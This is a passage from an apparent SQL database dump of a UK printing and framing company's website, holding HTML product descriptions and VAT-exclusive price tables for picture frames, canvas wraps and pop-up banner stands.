/>\r\n<br />\r\nThis frame is highly innovative on many levels and the combination of frame moulding and acrylic inlay, which is guaranteed to provide a definite \'wow factor\'. <br />\r\n<br />\r\nAcrylic inlay available in 3mm thick white, black or clear (as shown).</p>\r\n</span>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"173\" height=\"160\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Frame</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong><br />\r\n <font size=\"2\">Price</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x16 </font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 90+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 100+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 110+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x24</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 115+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 120+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 130+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">40x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 135+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">50x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 145+vat</strong></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n</p>','Moulding <span class=\'pinksmalltitle\'> Style\'s</span>','<br />\r\n<img alt=\"\" width=\"174\" height=\"197\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Lacquer_mould.jpg\" />','Y','2011-03-29 12:19:29','2010-05-19 10:53:29',94),(29,'Layout2','2','Naturals','framing-naturals.php','Naturals','Naturals','Naturals','','PROD_29.jpg','','The <span class=\'pinksmalltitle\'> Naturals</span>','<p><span lang=\"EN-GB\"><br />\r\nBringing the outside in, these three carefully chosen Wood Grains will naturally blend into any environment. With more and more home furninshing using wood grain-esque finishings, the Naturals frame has the ability to adapt itsellf into its surroundings and is perfect for someone searching for a more subtle approach to image presentation.<br />\r\n<br />\r\nThis frame is also available with a \'traditional\' glass and mount frontage presentation. For this it is an added<br />\r\n10% on top of the list price. </span></p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"173\" height=\"160\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Frame</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong><br />\r\n <font size=\"2\">Price</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x16 </font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 75+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 80+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 85+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x24</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 90+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 95+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">36x16</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 105+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x30</font></td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\" size=\"2\">£ 110+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">40x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 115+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">50x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 120+vat</strong></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font></p>','Moulding <span class=\'pinksmalltitle\'> Style\'s</span>','<br />\r\n<img alt=\"\" width=\"174\" height=\"204\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Woodlands_Moulding.jpg\" />','Y','2011-11-05 16:18:16','2010-05-19 10:54:56',31),(30,'Layout2','2','Platinum','framing-platinum.php','Platinum','Platinum','Platinum','','PROD_30.jpg','','The <span class=\'pinksmalltitle\'> Platinum</span>','<p><span lang=\"EN-GB\"><br />\r\nA classic and sleek frame that is suitable for almost any image, combining simplicity and style to create a presentation that will reflect both traditional and modern tastes.<br />\r\n<br />\r\nThis frame is also available with a \'traditional\' glass and mount frontage presentation. For this it is an added<br />\r\n10% on top of the list price. </span></p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"173\" height=\"160\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Frame</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong><br />\r\n <font size=\"2\">Price</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x16 </font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 65+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 70+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 75+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x24</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 80+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 85+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">36x16</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 90+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x30</font></td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\" size=\"2\">£ 95+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">40x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 100+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">50x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 110+vat</strong></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font></p>','Moulding <span class=\'pinksmalltitle\'> Style\'s</span>','<br />\r\n<img alt=\"\" width=\"170\" height=\"122\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Platinum_mould.jpg\" />','Y','2011-11-05 16:17:30','2010-05-19 10:56:19',29),(31,'Layout2','2','Ultimate Canvas Wrap','framing-ultimate.php','Ultimate Canvas Wrap','Ultimate Canvas Wrap','Ultimate Canvas Wrap','','PROD_31.jpg','','The <span class=\'pinksmalltitle\'> Ultimate Canvas Wrap</span>','<p><span lang=\"EN-GB\"><br />\r\nA wealth of expertise and precision has created the ultimate in canvas presentation. An opulent combination of our handstretched canvas and sleek linear frame moulding, delivering outstanding quality and style.</span></p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><font size=\"1\">(All measurements are in inches)</font><br />\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"170\" height=\"160\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\"><br />\r\n <font size=\"2\"><strong><font color=\"#ec008c\">Frame</font></strong> <font color=\"#000000\">Size</font></font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>\r\n <p><br />\r\n <font size=\"2\">Price <br />\r\n </font><font color=\"#000000\" size=\"1\">(inc canvas)</font></p>\r\n </strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x16 </font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 150+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">20x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 160+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 165+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">24x24</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 175+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x20</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 185+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">36x16</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 200+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">30x30</font></td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\" size=\"2\">£ 200+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">40x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 220+vat</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><font size=\"2\">50x30</font></td>\r\n <td valign=\"top\"><font color=\"#ec008c\" size=\"2\"><strong>£ 240+vat</strong></font></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n<br />\r\n<font size=\"2\">Bespoke size options also available which <br />\r\nwill be quoted on request. Please contact <br />\r\n(01254) 681001 for more details.</font></p>','Moulding <span class=\'pinksmalltitle\'> Style\'s</span>','<br />\r\n<img alt=\"\" width=\"170\" height=\"143\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Ultimate_Mould.jpg\" />','Y','2011-11-05 16:19:54','2010-05-19 10:57:33',112),(32,'Layout2','3','Sizes & Prices','canvas-size&price.php','Sizes & Prices','Sizes & Prices','Sizes & Prices','','PROD_32.jpg','','Canvas <span class=\'pinksmalltitle\'> Wraps</span>','<p><br />\r\n<font color=\"#333333\">Our canvas wraps are a high grade, superior quality finished product. Printed directly onto artists\' canvas using pigmented inks, they are heat sealed laminated for durabilty and protection then hand stretched onto purpose built 44mm stretcher frames. <br />\r\n<br />\r\nAt every stage of production we take the utmost care and consideration for the final product. We are aware that the market for such items is varied and wide, but only when you see the true quality and craftsmanship which goes into each wrap, will you appreciate our expertise and knowledge in this field.</font></p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\r\n <tbody>\r\n <tr>\r\n <td valign=\"top\" style=\"width: 100px;\"><strong><font color=\"#ec008c\">Image</font> Size</strong></td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Price</strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 10x8</td>\r\n <td valign=\"top\"><br />\r\n <strong><font color=\"#ec008c\">£ 27+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">12x10</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 31+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 36+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">18x12</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 39+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 42+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x16</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 47+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 51+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x20</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 57+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 72+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 87+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">40x30</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 106+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">40x40</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 112+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">60x40</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 156+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">80x40</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 208+vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">100x40</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 260+vat</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>','Product <span class=\'pinksmalltitle\'> Detail\'s</span>','<br />\r\n<img height=\"540\" width=\"170\" alt=\"\" src=\"http://www.paulgrahamltd.com/EditorImages/image/Canvas_Details.jpg\" />','Y','2010-06-09 11:49:57','2010-05-19 12:32:19',32),(33,'Layout1','3','Grouping Variations','canvas-grouping.php','Grouping Variations','Grouping Variations','Grouping Variations','<img alt=\"\" align=\"left\" width=\"747\" height=\"1194\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Groupings.jpg\" /><br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<font color=\"#ffffff\">a</font>','','','','','','','','','Y','2010-06-08 10:44:16','2010-05-19 13:12:18',33),(34,'Layout2','7','Economy','pop-up-economy.php','Economy','Economy','Economy','','PROD_34.jpg','','The <span class=\\\'pinksmalltitle\\\'> Economy</span>','<br />\r\nThe Economy is our entry level value system - a single sided roller banner utilising a twist out foot, telescopic pole and mechanical hanger. The unit also comes with its own individual carry case. An optional chrome feature light is also available with this model which gives a highly sleek professional finish to the unit.<br />\r\n<br />\r\nA lightweight rolling mechanism and simplistic assembly instructions give a highly attractive presentation system for any occasion from fund raisers to parties and celebrations.<br />\r\n<br />\r\nThis unit has been specifically designed to be a disposable minimal use unit, and does not have the facility to have interchangeable graphics.','Graphic Size & <span class=\\\'pinksmalltitle\\\'> Price</span>','<p><br />\r\nThe Economy has a total graphic size of:<br />\r\n<br />\r\n800mm x 2000mm.<br />\r\n<font color=\"#ec008c\"><strong>£79+vat<br />\r\n</strong></font><br />\r\nOptional Chrome Light<br />\r\n<strong><font color=\"#ec008c\">£20+vat</font></strong><br />\r\n<br />\r\nAll artwork for banners to be supplied at 800x2000 @ 150dpi and saved as a jpg.</p>','Product <span class=\'pinksmalltitle\'> Detail\'s</span>','<br />\r\n<img alt=\"\" width=\"164\" height=\"302\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Economy-pg.jpg\" />','Y','2013-04-03 15:45:20','2010-05-19 13:21:33',34),(35,'Layout2','7','Standard','pop-up-standard.php','Standard','Standard','Standard','','PROD_35.jpg','','The <span class=\'pinksmalltitle\'> Standard</span>','<p> </p>\r\n<p>The Standard is the next step up from our Economy banner stand. A versatile and diverse unit lending itself to use in a multitude of applications, it comprises a single sided unit, built in roller mechanism, weighted anti -slip base, mechanical hanger and a marked telescopic pole. The unit also comes complete with its own carry case. An optional chrome feature light is also available with this model which gives a highly sleek professional finish to the unit.<br />\r\n<br />\r\nA more durable unit than the Economy, the Standard is an ideal visual solution for corporate events and displays.<br />\r\n<br />\r\nThe graphic within this unit also comes heat sealed laminated for visual durability.</p>','Graphic Size & <span class=\'pinksmalltitle\'> Price</span>','<p><br />\r\nThe Standard has a <br />\r\ntotal graphic size of:<br />\r\n<br />\r\n800mm x 2100mm.<br />\r\n<font color=\"#ec008c\"><strong>£129+vat</strong></font><br />\r\n<br />\r\nOptional Chrome Light<br />\r\n<strong><font color=\"#ec008c\">£20+vat</font></strong><br />\r\n<br />\r\nAll artwork for banners to be supplied at 800x2100 @ 150dpi and saved as a jpg.</p>','Product <span class=\'pinksmalltitle\'> Detail\'s</span>','<br />\r\n<img alt=\"\" width=\"170\" height=\"241\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Standard_pg.jpg\" />','Y','2010-06-10 09:49:02','2010-05-19 13:28:47',35),(36,'Layout2','7','Two-Way','the-two-way.php','Two-Way','Two-Way','Two-Way','','PROD_36.jpg','','The <span class=\\\'pinksmalltitle\\\'> Two- Way</span>','<br />\r\nThe Two- Way is a highly innovative display module. The design of the mechanism allows you to have a double sided graphic presentation and is a highly durable visual unit. It also comes with its own individual carry case. <br />\r\n<br />\r\nAn optional chrome feature light is also available with this model which gives a highly sleek professional finish to the unit.<br />\r\n<br />\r\nIntegral hanging poles, self adhesive hanger and simplistic assembly instructions provide a highly attractive presentation system for any occasion from window and instore advertising to stand alone point of sale.<br />\r\n<br />\r\n<br />\r\nThe graphics within this unit also come heat sealed laminated for visual durability.','Graphic Size & <span class=\\\'pinksmalltitle\\\'> Price</span>','<p><br />\r\nThe Two- Way has two total <br />\r\ngraphic sizes available of:<br />\r\n<br />\r\n800mm x 2100mm<br />\r\n1000mm x 2100mm.<br />\r\n<font color=\"#ec008c\"><strong>£299+vat<br />\r\n</strong><font color=\"#000000\"><br />\r\nOptional Chrome Light<br />\r\n</font><strong><font color=\"#ec008c\">£20+vat</font></strong></font><br />\r\n<br />\r\nAll artwork for banners to be supplied at required size @150dpi and saved as a jpg.</p>','Product <span class=\'pinksmalltitle\'> Detail\'s</span>','<br />\r\n<img height=\"241\" width=\"170\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Two_Way-pg.jpg\" alt=\"\" />','Y','2010-06-09 11:34:29','2010-05-19 13:31:47',37),(37,'Layout2','7','Link','pop-up-link.php','Link','Link','Link','','PROD_37.jpg','','The <span class=\'pinksmalltitle\'> Link</span>','<br />\r\nThe Link is a wonderfully crafted, lightweight and versatile roller system. A brand new concept in visual display graphics, this unit has the functionality to be magnetically linked to another unit evolving into 2, 3 or as many units as you need so as your message, or business, grows the link can grow with it. We sell the unit both as a single or as a multi combination unit dependant on your needs.<br />\r\n<br />\r\nEach single unit comes complete with its own padded carry case and telescopic pole. A low voltage spotlight is also available.<br />\r\n<br />\r\nThe graphic within this unit also comes heat sealed laminated for visual durability.','Graphic Size & <span class=\'pinksmalltitle\'> Price</span>','<p><br />\r\nThe Link has a total graphic size of:<br />\r\n<br />\r\n850mm w x 2000mm h<br />\r\n<br />\r\nSingle roller unit<br />\r\n<font color=\"#ec008c\"><strong>£199+vat<br />\r\n<br />\r\n</strong></font><font color=\"#ec008c\"><font color=\"#000000\">Individual Links Price</font><font color=\"#000000\"><br />\r\n</font><strong><font color=\"#ec008c\">£16+vat<br />\r\n<br />\r\n</font></strong></font>All artwork for banners to be supplied at required size @150dpi and saved as a jpg.</p>','Product <span class=\'pinksmalltitle\'> Detail\'s</span>','<br />\r\n<img height=\"525\" align=\"left\" width=\"175\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Link_Stand-pg.jpg\" alt=\"\" />','Y','2010-06-04 14:07:31','2010-05-19 13:35:11',38),(38,'Layout2','7','Prestige','the-prestige.php','Prestige','Prestige','Prestige','','PROD_38.jpg','','The <span class=\'pinksmalltitle\'> Prestige</span>','<br />\r\nThe Prestige is our elite presentation system; elegant, practical and offering rapid assembly. Its minimalist design is the perfect choice to suit any surroundings. The unit also comes with its very own individual carry case. An optional chrome feature light is also available with this model which gives it a highly sleek professional finish.<br />\r\n<br />\r\nMechanical hanging system, quick change graphic facility and a highly attractive base unit give a superior crafted display unit suitable for any occasion from high end corporate events to wedding fayres.<br />\r\n<br />\r\nThe graphic within this unit also comes heat sealed laminated for visual durability.','Graphic Size & <span class=\'pinksmalltitle\'> Price</span>','<p><br />\r\nThe Prestige has a total graphic size of:<br />\r\n<br />\r\n800mm x 2100mm.<br />\r\n<font color=\"#ec008c\"><strong>£199+vat<br />\r\n<br />\r\n</strong><font color=\"#000000\">Optional Chrome Light<br />\r\n</font><strong><font color=\"#ec008c\">£20+vat</font></strong></font><br />\r\n<br />\r\nAll artwork for banners to be supplied at 800x2000 @ 150dpi and saved as a jpg.</p>','Product <span class=\'pinksmalltitle\'> Detail\'s</span>','<br />\r\n<img height=\"302\" alt=\"\" width=\"164\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Prestige-pg.jpg\" />','Y','2010-06-04 14:09:15','2010-05-19 13:39:22',36),(39,'Layout2','7','Twist:-Original','pop-up-orig-twist.php','Twist:-Original','Twist:-Original','Twist:-Original','','PROD_39.jpg','','The <span class=\'pinksmalltitle\'> Twist:-Original</span>','<p><br />\r\nExtremely stable and simple to erect, the original Twist banner is the basis for the Twist range. Complete with an integrated low voltage light and transformer, the Twist also has the ability to be single or double sided as standard, i.e. graphics on the front and back.</p>\r\n<p>With just one set of hardware, the Original Twist can take any width graphic panel between 700mm - 1000mm and, linking with our Easi link kit, seamlessly joins stands and graphics together. Moreover, the patented tensioning system makes theTwist self levelling, allowing banners to link together on uneven and difficult floors.</p>','Graphic Size & <span class=\'pinksmalltitle\'> Price</span>','<p><br />\r\nThe Twist comes in varying height and width combinations to best suit your intended use for the unit the available<br />\r\nsizes are:<br />\r\n<br />\r\n<font size=\"1\"><font size=\"2\"><font color=\"#ec008c\"><strong>Widths: Price: <br />\r\n <br />\r\n</strong></font><font size=\"1\">700-800 x 2000 h <font size=\"2\"><strong><font color=\"#ec008c\">£ 295+vat</font></strong><br />\r\n</font>700-800 x 2700 h <strong><font color=\"#ec008c\" size=\"2\">£ 310+vat</font></strong><br />\r\n900-1000 x 2000 h </font><font size=\"1\"><font color=\"#ec008c\"><strong><font size=\"2\">£ 305+vat</font><br />\r\n</strong></font>900-1000 x 2700 h </font><font color=\"#ec008c\"><strong>£ 320+vat</strong></font><br />\r\n<br />\r\nAll measurements in mm.</font><br />\r\n</font></p>','','','N','2010-06-08 12:05:38','2010-05-19 13:42:40',39),(40,'Layout2','7','Twist:- Flexi Link','pop-up-flexi-link.php','Twist:- Flexi Link','Twist:- Flexi Link','Twist:- Flexi Link','','PROD_40.jpg','','The <span class=\'pinksmalltitle\'> Twist:-Flexi Link</span>','<br />\r\n<p>The Flexi link has been developed so that you can create and recreate virtually any stand shape you require without having to change hardware or graphics.</p>\r\n<p>Designed not only to look different when compared to the majority of exhibition stands, the Flexi link, when used in conjunction with the Original or Media Twist, offers greater flexibility for companies who do not always know what their stand space is going to be.</p>\r\n<p>With an unprecedented amount of flexibility from a portable and modular stand, the Flexi link , when combined with Twist offers you a true return on investment; simply twist, bend and shape the stand to your needs. The days of being stuck with one stand configuration are at an end. “We cannot say enough about how flexible this system is and the freedom it gives you to create virtually any stand layout you might need.” </p>\r\n<p> </p>','Graphic Size & <span class=\'pinksmalltitle\'> Price</span>','<br />\r\nThe Flexi Link has been designed specifically to adjoin numerous amounts of Original and Media Twist units to one another, the Flexi Link has one fixed width but comes in all the varying heights to coincide with whichever unit size you already have.<br />\r\n<br />\r\n<font size=\"2\"><strong><font color=\"#ec008c\">Width: Price: <br />\r\n <br />\r\n</font></strong>550 x 2000 h <strong><font color=\"#ec008c\">£ 160+vat</font><br />\r\n</strong>550 x 2700 h <strong> <font color=\"#ec008c\">£ 180+vat</font></strong><br />\r\nAll measurements in mm.</font>','','','N','2010-06-01 10:15:33','2010-05-19 13:54:31',40),(41,'Layout2','7','Twist:- Media Twist','pop-up-media-twist.php','Twist:- Media Twist','Twist:- Media Twist','Twist:- Media Twist','','PROD_41.jpg','','The <span class=\'pinksmalltitle\'> Twist:-Media</span>','<br />\r\n<p>Complementing the Twist range, the Media Twist is designed to enable a TFT or LCD/DVD player to be easily attached using a standard VESA mount; meaning you do not have to buy a special screen - just use a conventional monitor/tv.</p>\r\n<p>The Media Twist can be used as a single banner or in conjunction with the Flexi link system so, by using Twist, you now have the ability not only to create different stand configurations but also to add a moving image or presentation to your exhibition stand also.<br />\r\n<br />\r\nPlease not that we DO NOT supply the screen with this unit, we supply the unit fitted with the VESA mount and a window cut in the graphic in a template specified area to allow you to house a screen which should be no heavier than 8.5 Kilos in weight.</p>\r\n<p>Please contact the studio for any further information regarding screen compatibilities and sizes.</p>','Graphic Size & <span class=\'pinksmalltitle\'> Price</span>','<br />\r\nThe Twist comes in varying height and width combinations to best suit your intended use for the unit the available<br />\r\nsizes are:<br />\r\n<br />\r\n<font size=\"1\"><font size=\"2\"><font color=\"#ec008c\"><strong>Widths: Price: <br />\r\n <br />\r\n</strong></font><font size=\"1\">700-800 x 2000 h</font> <font color=\"#ec008c\"> <strong>£ 345+vat</strong><br />\r\n</font><font size=\"1\">700-800 x 2700 h</font> <strong><font color=\"#ec008c\">£ 360+vat</font></strong><br />\r\n<font size=\"1\">900-1000 x 2000 h</font> <strong><font color=\"#ec008c\">£ 355+vat</font></strong><br />\r\n<font size=\"1\">900-1000 x 2700 h</font> <strong><font color=\"#ec008c\">£ 370+vat</font><br />\r\n</strong><br />\r\nAll measurements in mm.</font></font>','','','N','2010-06-08 12:06:12','2010-05-19 13:57:35',41),(42,'Layout2','7','Twist:- End Caps','pop-up-end-caps.php','Twist:- End Caps','Twist:- End Caps','Twist:- End Caps','','PROD_42.jpg','','The <span class=\'pinksmalltitle\'> Twist:- End Caps</span>','<br />\r\n<p>Another advantage of the Twist banner is that there is no frame work to hide, meaning Twist can be used with or without end graphic panels. </p>','Graphic Size & <span class=\'pinksmalltitle\'> Price</span>','<br />\r\nThe End Caps have been designed specifically to adjoin to the end of either the Original or Media Twist units. The End Caps have one fixed width but comes in all the varying heights to 